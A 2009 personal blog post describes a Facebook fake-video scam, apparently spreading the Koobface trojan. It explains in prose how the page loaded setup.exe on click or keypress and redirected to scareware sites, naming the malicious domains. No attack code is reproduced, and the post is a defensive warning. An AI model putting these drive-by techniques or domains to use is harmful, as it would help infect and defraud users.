Facebook and fake video
Friday, October 16th, 2009First I noticed a friend had added a video to my wall. It didn’t look like his usual stuff - being Scandinavian, he rarely posts in English, and he wouldn’t use slang. So I thought, hmmm…

Of course, I should have noticed that there was no play button on there, but that could have been faked too, so that’s no guarantee!
Next I notice this status update on his profile:
Got a video in my inbox called “Woww! Is thaat reallyy you in that viideo?” Do not click on it. It is a computer virus. And it does not come from me.
I told him immediately that he could track where that “video” had been posted by following the small links on his profile, and he could remove them from other people’s profiles, since “he” had posted them. I suggest others do that as well, if it happens to you!
Then I check the code on the page. There’s a script that’s too convoluted I don’t bother figuring it out (and my antivirus blocks the page as dangerous anyway), but I did note this:

I do however notice a list of IP numbers in the next table, just slightly obfuscated. One of those gives me (in a text browser) a page that includes the words: Video | Facebook. And there’s also a file: setup.exe which is loaded on document.onclick and document.onkeydown
I also notice an address that seems to be loaded when you leave the page, going to an affiliate id 02979 at mexcleaner.in. That page includes this sentence:
Your computer is stongly infected by viruses! ‘ It can cause data loss and file damages and need to be cured as soon as possible
It then gives a bogus list of infections, along with a solution:
Affiliate ID 02979 at downloadmasters.org
A report on Siteadvisor from two days ago implicates that site as directing to Trojan.
———-
Update: Similar messages as used with these fake videos are known for a while on Twitter, and back then it was the Koobface trojan that was pushed. Here’s what Kee Heritage has to say about this.
A friend who got stung by this said she never clicked on any fake video, so she doesn’t understand how she got it. She has Panda antivirus on her computer, and the scan came up empty. TrendMicro however tends to block most of the pages used in this attack.
Update October 30:
From what I’ve seen of the fake videos, this TrendMicro writeup about Koobface looks very familiar - the addresses last used were blogspot addresses.
————
Sorry I’ve been incommunicado for so long. I figured I’d shift this blog over to the stuff I’m blogging about here, and so far this was the first thing that really got me going enough to divert from all the other stuff I’m doing. Sorry..
